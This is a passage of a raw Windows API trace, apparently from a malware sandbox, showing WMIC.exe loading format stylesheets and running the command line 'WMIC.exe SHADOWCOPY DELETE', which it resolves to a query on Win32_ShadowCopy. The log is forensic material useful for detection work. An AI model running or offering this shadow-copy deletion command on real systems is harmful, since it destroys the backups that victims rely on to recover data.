(_Size=0x18) returned 0x37bb10 [0139.032] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.032] free (_Block=0x37bb10) [0139.032] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x2)) returned 0x0 [0139.032] malloc (_Size=0x18) returned 0x37bb10 [0139.032] malloc (_Size=0x18) returned 0x37bb30 [0139.032] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0139.032] SysStringLen (param_1="TABLE") returned 0x5 [0139.032] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0139.032] SysStringLen (param_1="XML") returned 0x3 [0139.032] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0139.032] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.032] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0139.032] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.032] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.032] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0139.032] malloc (_Size=0x30) returned 0x378380 [0139.032] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.032] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.032] IUnknown:Release (This=0x214a280) returned 0x0 [0139.033] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=13, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.033] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="texttable.xsl") returned 0x0 [0139.033] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.033] malloc (_Size=0x18) returned 0x37bb50 [0139.033] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.033] free (_Block=0x37bb50) [0139.033] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x2)) returned 0x0 [0139.033] malloc (_Size=0x18) returned 0x37bb50 [0139.033] malloc (_Size=0x18) returned 0x37bb70 [0139.033] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0139.033] SysStringLen (param_1="TABLE") returned 0x5 [0139.033] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0139.033] SysStringLen (param_1="XML") returned 0x3 [0139.033] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0139.033] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.033] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0139.033] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.033] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.033] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0139.033] malloc (_Size=0x30) returned 0x3783c0 [0139.034] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.034] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.034] IUnknown:Release (This=0x214a280) returned 0x0 [0139.034] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=14, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.034] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="texttable.xsl") returned 0x0 [0139.034] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.034] malloc (_Size=0x18) returned 0x37bb90 [0139.034] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.034] free (_Block=0x37bb90) [0139.034] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x2)) returned 0x0 [0139.034] malloc (_Size=0x18) returned 0x37bb90 [0139.034] malloc (_Size=0x18) returned 0x37bbb0 [0139.034] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0139.034] SysStringLen (param_1="TABLE") returned 0x5 [0139.034] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0139.034] SysStringLen (param_1="XML") returned 0x3 [0139.034] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0139.034] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.034] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0139.034] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.034] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0139.035] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0139.035] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.035] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0139.035] malloc (_Size=0x30) returned 0x378400 [0139.035] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.035] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.035] IUnknown:Release (This=0x214a280) returned 0x0 [0139.035] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=15, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.035] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="htable.xsl") returned 0x0 [0139.035] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.035] malloc (_Size=0x18) returned 0x37bbd0 [0139.035] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.035] free (_Block=0x37bbd0) [0139.035] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x2)) returned 0x0 [0139.035] malloc (_Size=0x18) returned 0x37bbd0 [0139.035] malloc (_Size=0x18) returned 0x37bbf0 [0139.035] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0139.035] SysStringLen (param_1="TABLE") returned 0x5 [0139.035] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0139.036] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.036] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0139.036] SysStringLen (param_1="XML") returned 0x3 [0139.036] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0139.036] SysStringLen (param_1="texttablewsys") returned 0xd [0139.036] SysStringLen (param_1="XML") returned 0x3 [0139.036] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0139.036] malloc (_Size=0x30) returned 0x378440 [0139.036] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.036] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.036] IUnknown:Release (This=0x214a280) returned 0x0 [0139.036] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=16, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.036] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="htable.xsl") returned 0x0 [0139.039] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.039] malloc (_Size=0x18) returned 0x37bc10 [0139.039] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.039] free (_Block=0x37bc10) [0139.039] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x2)) returned 0x0 [0139.039] malloc (_Size=0x18) returned 0x37bc10 [0139.039] malloc (_Size=0x18) returned 0x37bc30 [0139.039] SysStringLen (param_1="htable-sortby") returned 0xd [0139.039] SysStringLen (param_1="TABLE") returned 0x5 [0139.039] SysStringLen (param_1="htable-sortby") returned 0xd [0139.039] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.039] SysStringLen (param_1="htable-sortby") returned 0xd [0139.039] SysStringLen (param_1="XML") returned 0x3 [0139.040] SysStringLen (param_1="htable-sortby") returned 0xd [0139.040] SysStringLen (param_1="texttablewsys") returned 0xd [0139.040] SysStringLen (param_1="htable-sortby") returned 0xd [0139.040] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0139.040] SysStringLen (param_1="XML") returned 0x3 [0139.040] SysStringLen (param_1="htable-sortby") returned 0xd [0139.040] malloc (_Size=0x30) returned 0x378480 [0139.040] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.040] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.040] IUnknown:Release (This=0x214a280) returned 0x0 [0139.040] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=17, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.040] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="mof.xsl") returned 0x0 [0139.040] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.040] malloc (_Size=0x18) returned 0x37bc50 [0139.040] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.040] free (_Block=0x37bc50) [0139.040] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x2)) returned 0x0 [0139.041] malloc (_Size=0x18) returned 0x37bc50 [0139.041] malloc (_Size=0x18) returned 0x37bc70 [0139.041] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0139.041] SysStringLen (param_1="TABLE") returned 0x5 [0139.041] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0139.041] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.041] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0139.041] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.041] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0139.041] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0139.041] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.041] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0139.041] malloc (_Size=0x30) returned 0x3784c0 [0139.041] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.041] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.041] IUnknown:Release (This=0x214a280) returned 0x0 [0139.041] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=18, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.041] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="mof.xsl") returned 0x0 [0139.041] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.041] malloc (_Size=0x18) returned 0x37bc90 [0139.042] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.042] free (_Block=0x37bc90) [0139.042] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x2)) returned 0x0 [0139.042] malloc (_Size=0x18) returned 0x37bc90 [0139.042] malloc (_Size=0x18) returned 0x37bcb0 [0139.042] SysStringLen (param_1="wmiclimofformat") returned 0xf [0139.042] SysStringLen (param_1="TABLE") returned 0x5 [0139.042] SysStringLen (param_1="wmiclimofformat") returned 0xf [0139.042] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.042] SysStringLen (param_1="wmiclimofformat") returned 0xf [0139.042] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.042] SysStringLen (param_1="wmiclimofformat") returned 0xf [0139.042] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0139.042] SysStringLen (param_1="wmiclimofformat") returned 0xf [0139.042] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0139.042] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.042] SysStringLen (param_1="wmiclimofformat") returned 0xf [0139.042] malloc (_Size=0x30) returned 0x378500 [0139.042] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.042] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.042] IUnknown:Release (This=0x214a280) returned 0x0 [0139.043] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=19, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.043] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="textvaluelist.xsl") returned 0x0 [0139.043] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.043] malloc (_Size=0x18) returned 0x37bcd0 [0139.043] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.043] free (_Block=0x37bcd0) [0139.043] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x2)) returned 0x0 [0139.043] malloc (_Size=0x18) returned 0x37bcd0 [0139.043] malloc (_Size=0x18) returned 0x37bcf0 [0139.043] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0139.043] SysStringLen (param_1="TABLE") returned 0x5 [0139.043] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0139.043] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.043] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0139.044] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.044] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0139.044] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0139.044] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0139.044] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0139.044] malloc (_Size=0x30) returned 0x378540 [0139.044] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.044] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.044] IUnknown:Release (This=0x214a280) returned 0x0 [0139.044] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=20, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.044] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="textvaluelist.xsl") returned 0x0 [0139.044] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.044] malloc (_Size=0x18) returned 0x37bd10 [0139.044] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.044] free (_Block=0x37bd10) [0139.045] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x2)) returned 0x0 [0139.045] malloc (_Size=0x18) returned 0x37bd10 [0139.045] malloc (_Size=0x18) returned 0x37bd30 [0139.045] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0139.045] SysStringLen (param_1="TABLE") returned 0x5 [0139.045] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0139.045] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.045] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0139.045] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.045] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0139.045] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0139.045] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0139.045] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0139.045] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0139.045] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0139.045] malloc (_Size=0x30) returned 0x378580 [0139.045] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.045] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.045] IUnknown:Release (This=0x214a280) returned 0x0 [0139.045] IUnknown:Release (This=0x2149cc0) returned 0x0 [0139.045] FreeThreadedDOMDocument:IUnknown:Release (This=0x214bc50) returned 0x1 [0139.045] FreeThreadedDOMDocument:IUnknown:Release (This=0x21471d0) returned 0x0 [0139.045] free (_Block=0x378ff0) [0139.046] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" SHADOWCOPY DELETE" [0139.048] malloc (_Size=0x70) returned 0x378fd0 [0139.048] memcpy_s (in: _Destination=0x378fd0, _DestinationSize=0x6e, _Source=0xd25ee, _SourceSize=0x6c | out: _Destination=0x378fd0) returned 0x0 [0139.048] malloc (_Size=0x18) returned 0x37bd50 [0139.048] malloc (_Size=0x18) returned 0x37bd70 [0139.048] malloc (_Size=0x18) returned 0x37bd90 [0139.048] malloc (_Size=0x18) returned 0x37bdb0 [0139.048] malloc (_Size=0x80) returned 0x37cb60 [0139.048] GetLocalTime (in: lpSystemTime=0x26f9f0 | out: lpSystemTime=0x26f9f0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x28, wSecond=0x32, wMilliseconds=0x4e)) [0139.048] _vsnwprintf (in: _Buffer=0x37cb60, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x26f948 | out: _Buffer="04-28-2020T20:40:50") returned 19 [0139.048] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0139.048] malloc (_Size=0x28) returned 0x376fa0 [0139.048] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0139.049] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0139.049] malloc (_Size=0x28) returned 0x379050 [0139.049] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0139.049] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0139.049] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0139.049] malloc (_Size=0x16) returned 0x37bdd0 [0139.049] lstrlenW (lpString="SHADOWCOPY") returned 10 [0139.049] _wcsicmp (_String1="SHADOWCOPY", _String2="\"NULL\"") returned 81 [0139.049] malloc (_Size=0x16) returned 0x37bdf0 [0139.049] malloc (_Size=0x8) returned 0x379080 [0139.049] free (_Block=0x0) [0139.049] free (_Block=0x37bdd0) [0139.049] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0139.049] malloc (_Size=0xe) returned 0x37bdd0 [0139.049] lstrlenW (lpString="DELETE") returned 6 [0139.049] _wcsicmp (_String1="DELETE", _String2="\"NULL\"") returned 66 [0139.049] malloc (_Size=0xe) returned 0x37be10 [0139.049] malloc (_Size=0x10) returned 0x37be30 [0139.049] memmove_s (in: _Destination=0x37be30, _DestinationSize=0x8, _Source=0x379080, _SourceSize=0x8 | out: _Destination=0x37be30) returned 0x0 [0139.049] free (_Block=0x379080) [0139.050] free (_Block=0x0) [0139.050] free (_Block=0x37bdd0) [0139.050] malloc (_Size=0x10) returned 0x37bdd0 [0139.050] lstrlenW (lpString="QUIT") returned 4 [0139.050] lstrlenW (lpString="SHADOWCOPY") returned 10 [0139.050] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0139.050] lstrlenW (lpString="EXIT") returned 4 [0139.050] lstrlenW (lpString="SHADOWCOPY") returned 10 [0139.050] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0139.050] free (_Block=0x37bdd0) [0139.050] WbemLocator:IUnknown:AddRef (This=0x1cf1390) returned 0x2 [0139.050] malloc (_Size=0x10) returned 0x37bdd0 [0139.050] lstrlenW (lpString="/") returned 1 [0139.050] lstrlenW (lpString="SHADOWCOPY") returned 10 [0139.050] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0139.050] lstrlenW (lpString="-") returned 1 [0139.050] lstrlenW (lpString="SHADOWCOPY") returned 10 [0139.050] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0139.051] lstrlenW (lpString="CLASS") returned 5 [0139.051] lstrlenW (lpString="SHADOWCOPY") returned 10 [0139.051] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0139.051] lstrlenW (lpString="PATH") returned 4 [0139.051] lstrlenW (lpString="SHADOWCOPY") returned 10 [0139.051] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0139.051] lstrlenW (lpString="CONTEXT") returned 7 [0139.051] lstrlenW (lpString="SHADOWCOPY") returned 10 [0139.051] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0139.051] lstrlenW (lpString="SHADOWCOPY") returned 10 [0139.051] malloc (_Size=0x16) returned 0x37be50 [0139.051] lstrlenW (lpString="SHADOWCOPY") returned 10 [0139.052] GetCurrentThreadId () returned 0xb18 [0139.052] ??0CHString@@QEAA@XZ () returned 0x26f800 [0139.053] malloc (_Size=0x18) returned 0x37be70 [0139.053] malloc (_Size=0x18) returned 0x37be90 [0139.053] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cf1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff482998 | out: ppNamespace=0xff482998*=0x1d03a98) returned 0x0 [0167.666] free (_Block=0x37be90) [0167.666] free (_Block=0x37be70) [0167.666] CoSetProxyBlanket (pProxy=0x1d03a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0167.666] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0167.666] GetCurrentThreadId () returned 0xb18 [0167.667] ??0CHString@@QEAA@XZ () returned 0x26f698 [0167.667] malloc (_Size=0x18) returned 0x37be70 [0167.667] malloc (_Size=0x18) returned 0x37be90 [0167.667] malloc (_Size=0x18) returned 0x37beb0 [0167.667] malloc (_Size=0x18) returned 0x37bed0 [0167.667] SysStringLen (param_1="root\\cli") returned 0x8 [0167.667] SysStringLen (param_1="\\") returned 0x1 [0167.667] malloc (_Size=0x18) returned 0x37bef0 [0167.667] SysStringLen (param_1="root\\cli\\") returned 0x9 [0167.667] SysStringLen (param_1="ms_409") returned 0x6 [0167.667] free (_Block=0x37bed0) [0167.667] free (_Block=0x37beb0) [0167.667] free (_Block=0x37be90) [0167.668] free (_Block=0x37be70) [0167.668] malloc (_Size=0x18) returned 0x37be70 [0167.668] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cf1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4829a0 | out: ppNamespace=0xff4829a0*=0x1d03b28) returned 0x0 [0167.684] free (_Block=0x37be70) [0167.684] free (_Block=0x37bef0) [0167.684] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0167.685] GetCurrentThreadId () returned 0xb18 [0167.685] ??0CHString@@QEAA@XZ () returned 0x26f810 [0167.685] malloc (_Size=0x18) returned 0x37bef0 [0167.685] malloc (_Size=0x18) returned 0x37be70 [0167.685] malloc (_Size=0x18) returned 0x37be90 [0167.685] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0167.685] malloc (_Size=0x3a) returned 0x37cbf0 [0167.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff411980, cbMultiByte=-1, lpWideCharStr=0x37cbf0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0167.685] free (_Block=0x37cbf0) [0167.685] malloc (_Size=0x18) returned 0x37beb0 [0167.685] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0167.685] SysStringLen (param_1="SHADOWCOPY") returned 0xa [0167.685] malloc (_Size=0x18) returned 0x37bed0 [0167.685] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SHADOWCOPY") returned 0x26 [0167.685] SysStringLen (param_1="'") returned 0x1 [0167.685] free (_Block=0x37beb0) [0167.685] free (_Block=0x37be90) [0167.686] free (_Block=0x37be70) [0167.686] free (_Block=0x37bef0) [0167.686] IWbemServices:GetObject (in: This=0x1d03a98, strObjectPath="MSFT_CliAlias.FriendlyName='SHADOWCOPY'", lFlags=0, pCtx=0x0, ppObject=0x26f818*=0x0, ppCallResult=0x0 | out: ppObject=0x26f818*=0x1d104e0, ppCallResult=0x0) returned 0x0 [0167.706] malloc (_Size=0x18) returned 0x37bef0 [0167.706] IWbemClassObject:Get (in: This=0x1d104e0, wszName="Target", lFlags=0, pVal=0x26f740*(varType=0x0, wReserved1=0xff48, wReserved2=0x0, wReserved3=0x0, varVal1=0xff482998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f740*(varType=0x8, wReserved1=0xff48, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0167.706] free (_Block=0x37bef0) [0167.706] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0167.706] malloc (_Size=0x3e) returned 0x37cbf0 [0167.707] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0167.707] malloc (_Size=0x18) returned 0x37bef0 [0167.707] IWbemClassObject:Get (in: This=0x1d104e0, wszName="PWhere", lFlags=0, pVal=0x26f740*(varType=0x0, wReserved1=0xff48, wReserved2=0x0, wReserved3=0x0, varVal1=0xfe1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f740*(varType=0x8, wReserved1=0xff48, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0167.707] free (_Block=0x37bef0) [0167.707] lstrlenW (lpString=" Where ID = '#'") returned 15 [0167.707] malloc (_Size=0x20) returned 0x37cc40 [0167.707] lstrlenW (lpString=" Where ID = '#'") returned 15 [0167.707] malloc (_Size=0x18) returned 0x37bef0 [0167.707] IWbemClassObject:Get (in: This=0x1d104e0, wszName="Connection", lFlags=0, pVal=0x26f740*(varType=0x0, wReserved1=0xff48, wReserved2=0x0, wReserved3=0x0, varVal1=0x14bd48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f740*(varType=0xd, wReserved1=0xff48, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d109c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0167.707] free (_Block=0x37bef0) [0167.707] IUnknown:QueryInterface (in: This=0x1d109c0, riid=0xff417360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26f730 | out: ppvObject=0x26f730*=0x1d109c0) returned 0x0 [0167.707] GetCurrentThreadId () returned 0xb18 [0167.707] ??0CHString@@QEAA@XZ () returned 0x26f658 [0167.708] malloc (_Size=0x18) returned 0x37bef0 [0167.708] IWbemClassObject:Get (in: This=0x1d109c0, wszName="Namespace", lFlags=0, pVal=0x26f680*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff42738f, 